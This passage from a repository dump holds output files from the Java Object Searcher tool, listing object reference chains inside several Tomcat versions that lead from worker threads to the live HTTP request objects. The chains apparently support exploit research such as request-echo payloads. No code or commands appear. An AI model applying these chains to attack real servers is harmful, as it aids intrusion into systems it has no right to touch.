44 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
45 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
46 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
47 | ---> global = {org.apache.coyote.RequestGroupInfo}
48 | ---> processors = {java.util.ArrayList}
49 | ---> [1] = {org.apache.coyote.RequestInfo}
50 |
51 |
52 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
53 | ---> group = {java.lang.ThreadGroup}
54 | ---> threads = {class [Ljava.lang.Thread;}
55 | ---> [3] = {java.lang.Thread}
56 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
57 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
58 | ---> children = {java.util.HashMap}
59 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
60 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
61 | ---> first = {org.apache.catalina.valves.AccessLogValve}
62 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
63 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
64 |
65 |
66 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
67 | ---> group = {java.lang.ThreadGroup}
68 | ---> threads = {class [Ljava.lang.Thread;}
69 | ---> [14] = {java.lang.Thread}
70 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
71 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
72 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
73 | ---> global = {org.apache.coyote.RequestGroupInfo}
74 | ---> processors = {java.util.ArrayList}
75 | ---> [0] = {org.apache.coyote.RequestInfo}
76 | ---> req = {org.apache.coyote.Request}
77 |
78 |
79 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
80 | ---> group = {java.lang.ThreadGroup}
81 | ---> threads = {class [Ljava.lang.Thread;}
82 | ---> [14] = {java.lang.Thread}
83 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
84 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
85 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
86 | ---> global = {org.apache.coyote.RequestGroupInfo}
87 | ---> processors = {java.util.ArrayList}
88 | ---> [1] = {org.apache.coyote.RequestInfo}
89 | ---> req = {org.apache.coyote.Request}
90 |
91 |
92 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
93 | ---> group = {java.lang.ThreadGroup}
94 | ---> threads = {class [Ljava.lang.Thread;}
95 | ---> [14] = {java.lang.Thread}
96 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
97 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
98 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
99 | ---> global = {org.apache.coyote.RequestGroupInfo}
100 | ---> processors = {java.util.ArrayList}
101 | ---> [0] = {org.apache.coyote.RequestInfo}
102 | ---> req = {org.apache.coyote.Request}
103 | ---> notes = {class [Ljava.lang.Object;}
104 | ---> [1] = {org.apache.catalina.connector.Request}
105 |
106 |
107 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
108 | ---> group = {java.lang.ThreadGroup}
109 | ---> threads = {class [Ljava.lang.Thread;}
110 | ---> [14] = {java.lang.Thread}
111 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
112 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
113 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
114 | ---> global = {org.apache.coyote.RequestGroupInfo}
115 | ---> processors = {java.util.ArrayList}
116 | ---> [1] = {org.apache.coyote.RequestInfo}
117 | ---> req = {org.apache.coyote.Request}
118 | ---> notes = {class [Ljava.lang.Object;}
119 | ---> [1] = {org.apache.catalina.connector.Request}
120 |
121 |
122 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
123 | ---> group = {java.lang.ThreadGroup}
124 | ---> threads = {class [Ljava.lang.Thread;}
125 | ---> [14] = {java.lang.Thread}
126 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
127 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
128 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
129 | ---> global = {org.apache.coyote.RequestGroupInfo}
130 | ---> processors = {java.util.ArrayList}
131 | ---> [0] = {org.apache.coyote.RequestInfo}
132 | ---> req = {org.apache.coyote.Request}
133 | ---> notes = {class [Ljava.lang.Object;}
134 | ---> [1] = {org.apache.catalina.connector.Request}
135 | ---> facade = {org.apache.catalina.connector.RequestFacade}
136 |
137 |
138 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
139 | ---> group = {java.lang.ThreadGroup}
140 | ---> threads = {class [Ljava.lang.Thread;}
141 | ---> [14] = {java.lang.Thread}
142 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
143 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
144 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
145 | ---> global = {org.apache.coyote.RequestGroupInfo}
146 | ---> processors = {java.util.ArrayList}
147 | ---> [0] = {org.apache.coyote.RequestInfo}
148 | ---> req = {org.apache.coyote.Request}
149 | ---> notes = {class [Ljava.lang.Object;}
150 | ---> [1] = {org.apache.catalina.connector.Request}
151 | ---> specialAttributes = {java.util.Map}
152 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
153 |
154 |
155 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
156 | ---> group = {java.lang.ThreadGroup}
157 | ---> threads = {class [Ljava.lang.Thread;}
158 | ---> [14] = {java.lang.Thread}
159 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
160 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
161 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
162 | ---> global = {org.apache.coyote.RequestGroupInfo}
163 | ---> processors = {java.util.ArrayList}
164 | ---> [0] = {org.apache.coyote.RequestInfo}
165 | ---> req = {org.apache.coyote.Request}
166 | ---> notes = {class [Ljava.lang.Object;}
167 | ---> [1] = {org.apache.catalina.connector.Request}
168 | ---> specialAttributes = {java.util.Map}
169 | ---> [org.apache.tomcat.comet.timeout.support] = {org.apache.catalina.connector.Request$8}
170 |
171 |
172 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
173 | ---> group = {java.lang.ThreadGroup}
174 | ---> threads = {class [Ljava.lang.Thread;}
175 | ---> [14] = {java.lang.Thread}
176 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
177 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
178 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
179 | ---> global = {org.apache.coyote.RequestGroupInfo}
180 | ---> processors = {java.util.ArrayList}
181 | ---> [0] = {org.apache.coyote.RequestInfo}
182 | ---> req = {org.apache.coyote.Request}
183 | ---> notes = {class [Ljava.lang.Object;}
184 | ---> [1] = {org.apache.catalina.connector.Request}
185 | ---> specialAttributes = {java.util.Map}
186 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
187 |
188 |
189 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
190 | ---> group = {java.lang.ThreadGroup}
191 | ---> threads = {class [Ljava.lang.Thread;}
192 | ---> [14] = {java.lang.Thread}
193 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
194 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
195 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
196 | ---> global = {org.apache.coyote.RequestGroupInfo}
197 | ---> processors = {java.util.ArrayList}
198 | ---> [0] = {org.apache.coyote.RequestInfo}
199 | ---> req = {org.apache.coyote.Request}
200 | ---> notes = {class [Ljava.lang.Object;}
201 | ---> [1] = {org.apache.catalina.connector.Request}
202 | ---> specialAttributes = {java.util.Map}
203 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
204 |
205 |
206 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
207 | ---> group = {java.lang.ThreadGroup}
208 | ---> threads = {class [Ljava.lang.Thread;}
209 | ---> [14] = {java.lang.Thread}
210 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
211 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
212 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
213 | ---> global = {org.apache.coyote.RequestGroupInfo}
214 | ---> processors = {java.util.ArrayList}
215 | ---> [0] = {org.apache.coyote.RequestInfo}
216 | ---> req = {org.apache.coyote.Request}
217 | ---> notes = {class [Ljava.lang.Object;}
218 | ---> [1] = {org.apache.catalina.connector.Request}
219 | ---> specialAttributes = {java.util.Map}
220 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$9}
221 |
222 |
223 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
224 | ---> group = {java.lang.ThreadGroup}
225 | ---> threads = {class [Ljava.lang.Thread;}
226 | ---> [14] = {java.lang.Thread}
227 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
228 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
229 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
230 | ---> global = {org.apache.coyote.RequestGroupInfo}
231 | ---> processors = {java.util.ArrayList}
232 | ---> [0] = {org.apache.coyote.RequestInfo}
233 | ---> req = {org.apache.coyote.Request}
234 | ---> notes = {class [Ljava.lang.Object;}
235 | ---> [1] = {org.apache.catalina.connector.Request}
236 | ---> specialAttributes = {java.util.Map}
237 | ---> [org.apache.tomcat.comet.support] = {org.apache.catalina.connector.Request$7}
238 |
239 |
240 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
241 | ---> group = {java.lang.ThreadGroup}
242 | ---> threads = {class [Ljava.lang.Thread;}
243 | ---> [14] = {java.lang.Thread}
244 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
245 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
246 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
247 | ---> global = {org.apache.coyote.RequestGroupInfo}
248 | ---> processors = {java.util.ArrayList}
249 | ---> [0] = {org.apache.coyote.RequestInfo}
250 | ---> req = {org.apache.coyote.Request}
251 | ---> notes = {class [Ljava.lang.Object;}
252 | ---> [1] = {org.apache.catalina.connector.Request}
253 | ---> specialAttributes = {java.util.Map}
254 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
255 |
256 |
257 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
258 | ---> group = {java.lang.ThreadGroup}
259 | ---> threads = {class [Ljava.lang.Thread;}
260 | ---> [14] = {java.lang.Thread}
261 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
262 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
263 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
264 | ---> global = {org.apache.coyote.RequestGroupInfo}
265 | ---> processors = {java.util.ArrayList}
266 | ---> [0] = {org.apache.coyote.RequestInfo}
267 | ---> req = {org.apache.coyote.Request}
268 | ---> notes = {class [Ljava.lang.Object;}
269 | ---> [1] = {org.apache.catalina.connector.Request}
270 | ---> specialAttributes = {java.util.Map}
271 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
272 |
273 |
274 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
275 | ---> group = {java.lang.ThreadGroup}
276 | ---> threads = {class [Ljava.lang.Thread;}
277 | ---> [14] = {java.lang.Thread}
278 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
279 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
280 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
281 | ---> global = {org.apache.coyote.RequestGroupInfo}
282 | ---> processors = {java.util.ArrayList}
283 | ---> [0] = {org.apache.coyote.RequestInfo}
284 | ---> req = {org.apache.coyote.Request}
285 | ---> notes = {class [Ljava.lang.Object;}
286 | ---> [1] = {org.apache.catalina.connector.Request}
287 | ---> specialAttributes = {java.util.Map}
288 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
289 |
290 |
291 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
292 | ---> group = {java.lang.ThreadGroup}
293 | ---> threads = {class [Ljava.lang.Thread;}
294 | ---> [14] = {java.lang.Thread}
295 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
296 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
297 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
298 | ---> global = {org.apache.coyote.RequestGroupInfo}
299 | ---> processors = {java.util.ArrayList}
300 | ---> [1] = {org.apache.coyote.RequestInfo}
301 | ---> req = {org.apache.coyote.Request}
302 | ---> notes = {class [Ljava.lang.Object;}
303 | ---> [1] = {org.apache.catalina.connector.Request}
304 | ---> facade = {org.apache.catalina.connector.RequestFacade}
305 |
306 |
307 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 8.5.53 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [15] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
14 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [15] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
24 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 | ---> processors = {java.util.ArrayList}
27 | ---> [0] = {org.apache.coyote.RequestInfo}
28 |
29 |
30 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
31 | ---> group = {java.lang.ThreadGroup}
32 | ---> threads = {class [Ljava.lang.Thread;}
33 | ---> [15] = {java.lang.Thread}
34 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
35 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
36 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
37 | ---> connections = {java.util.Map}
38 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
39 | ---> request = {org.apache.coyote.Request}
40 |
41 |
42 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
43 | ---> group = {java.lang.ThreadGroup}
44 | ---> threads = {class [Ljava.lang.Thread;}
45 | ---> [15] = {java.lang.Thread}
46 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
47 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
48 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
49 | ---> connections = {java.util.Map}
50 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
51 | ---> request = {org.apache.coyote.Request}
52 | ---> notes = {class [Ljava.lang.Object;}
53 | ---> [1] = {org.apache.catalina.connector.Request}
54 |
55 |
56 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
57 | ---> group = {java.lang.ThreadGroup}
58 | ---> threads = {class [Ljava.lang.Thread;}
59 | ---> [15] = {java.lang.Thread}
60 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
61 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
62 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
63 | ---> connections = {java.util.Map}
64 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
65 | ---> request = {org.apache.coyote.Request}
66 | ---> notes = {class [Ljava.lang.Object;}
67 | ---> [1] = {org.apache.catalina.connector.Request}
68 | ---> applicationRequest = {org.apache.catalina.connector.RequestFacade}
69 |
70 |
71 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
72 | ---> group = {java.lang.ThreadGroup}
73 | ---> threads = {class [Ljava.lang.Thread;}
74 | ---> [15] = {java.lang.Thread}
75 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
76 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
77 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
78 | ---> connections = {java.util.Map}
79 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
80 | ---> request = {org.apache.coyote.Request}
81 | ---> notes = {class [Ljava.lang.Object;}
82 | ---> [1] = {org.apache.catalina.connector.Request}
83 | ---> specialAttributes = {java.util.Map}
84 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
85 |
86 |
87 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
88 | ---> group = {java.lang.ThreadGroup}
89 | ---> threads = {class [Ljava.lang.Thread;}
90 | ---> [15] = {java.lang.Thread}
91 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
92 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
93 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
94 | ---> connections = {java.util.Map}
95 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
96 | ---> request = {org.apache.coyote.Request}
97 | ---> notes = {class [Ljava.lang.Object;}
98 | ---> [1] = {org.apache.catalina.connector.Request}
99 | ---> specialAttributes = {java.util.Map}
100 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
101 |
102 |
103 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
104 | ---> group = {java.lang.ThreadGroup}
105 | ---> threads = {class [Ljava.lang.Thread;}
106 | ---> [15] = {java.lang.Thread}
107 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
108 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
109 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
110 | ---> connections = {java.util.Map}
111 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
112 | ---> request = {org.apache.coyote.Request}
113 | ---> notes = {class [Ljava.lang.Object;}
114 | ---> [1] = {org.apache.catalina.connector.Request}
115 | ---> specialAttributes = {java.util.Map}
116 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
117 |
118 |
119 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
120 | ---> group = {java.lang.ThreadGroup}
121 | ---> threads = {class [Ljava.lang.Thread;}
122 | ---> [15] = {java.lang.Thread}
123 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
124 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
125 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
126 | ---> connections = {java.util.Map}
127 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
128 | ---> request = {org.apache.coyote.Request}
129 | ---> notes = {class [Ljava.lang.Object;}
130 | ---> [1] = {org.apache.catalina.connector.Request}
131 | ---> specialAttributes = {java.util.Map}
132 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$7}
133 |
134 |
135 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
136 | ---> group = {java.lang.ThreadGroup}
137 | ---> threads = {class [Ljava.lang.Thread;}
138 | ---> [15] = {java.lang.Thread}
139 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
140 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
141 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
142 | ---> connections = {java.util.Map}
143 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
144 | ---> request = {org.apache.coyote.Request}
145 | ---> notes = {class [Ljava.lang.Object;}
146 | ---> [1] = {org.apache.catalina.connector.Request}
147 | ---> specialAttributes = {java.util.Map}
148 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
149 |
150 |
151 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
152 | ---> group = {java.lang.ThreadGroup}
153 | ---> threads = {class [Ljava.lang.Thread;}
154 | ---> [15] = {java.lang.Thread}
155 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
156 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
157 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
158 | ---> connections = {java.util.Map}
159 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
160 | ---> request = {org.apache.coyote.Request}
161 | ---> notes = {class [Ljava.lang.Object;}
162 | ---> [1] = {org.apache.catalina.connector.Request}
163 | ---> specialAttributes = {java.util.Map}
164 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
165 |
166 |
167 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
168 | ---> group = {java.lang.ThreadGroup}
169 | ---> threads = {class [Ljava.lang.Thread;}
170 | ---> [15] = {java.lang.Thread}
171 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
172 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
173 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
174 | ---> connections = {java.util.Map}
175 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
176 | ---> request = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
184 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
185 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
186 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
187 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
188 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
189 | ---> domainTb = {java.util.Map>}
190 | ---> [Catalina] = {java.util.HashMap}
191 | ---> [Catalina] = {com.sun.jmx.mbeanserver.NamedObject}
192 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
193 | ---> resource = {org.apache.catalina.valves.AccessLogValve}
194 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
195 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
196 |
197 |
198 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
199 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
200 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
201 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
202 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
203 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
204 | ---> domainTb = {java.util.Map>}
205 | ---> [Catalina] = {java.util.HashMap}
206 | ---> entrySet = {java.util.HashMap$EntrySet}
207 | ---> this$0 = {class java.util.HashMap}
208 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
209 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
210 | ---> resource = {org.apache.coyote.RequestInfo}
211 |
212 |
213 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
214 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
215 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
216 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
217 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
218 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
219 | ---> domainTb = {java.util.Map>}
220 | ---> [Catalina] = {java.util.HashMap}
221 | ---> entrySet = {java.util.HashMap$EntrySet}
222 | ---> this$0 = {class java.util.HashMap}
223 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
224 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
225 | ---> resource = {org.apache.coyote.RequestInfo}
226 | ---> req = {org.apache.coyote.Request}
227 |
228 |
229 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
230 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
231 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
232 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
233 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
234 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
235 | ---> domainTb = {java.util.Map>}
236 | ---> [Catalina] = {java.util.HashMap}
237 | ---> entrySet = {java.util.HashMap$EntrySet}
238 | ---> this$0 = {class java.util.HashMap}
239 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
240 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
241 | ---> resource = {org.apache.coyote.RequestInfo}
242 | ---> req = {org.apache.coyote.Request}
243 | ---> notes = {class [Ljava.lang.Object;}
244 | ---> [1] = {org.apache.catalina.connector.Request}
245 |
246 |
247 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 9.0.33 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [16] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
14 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [16] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
24 | ---> connections = {java.util.Map>}
25 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
26 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
27 | ---> request = {org.apache.coyote.Request}
28 |
29 |
30 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
31 | ---> group = {java.lang.ThreadGroup}
32 | ---> threads = {class [Ljava.lang.Thread;}
33 | ---> [16] = {java.lang.Thread}
34 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
35 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
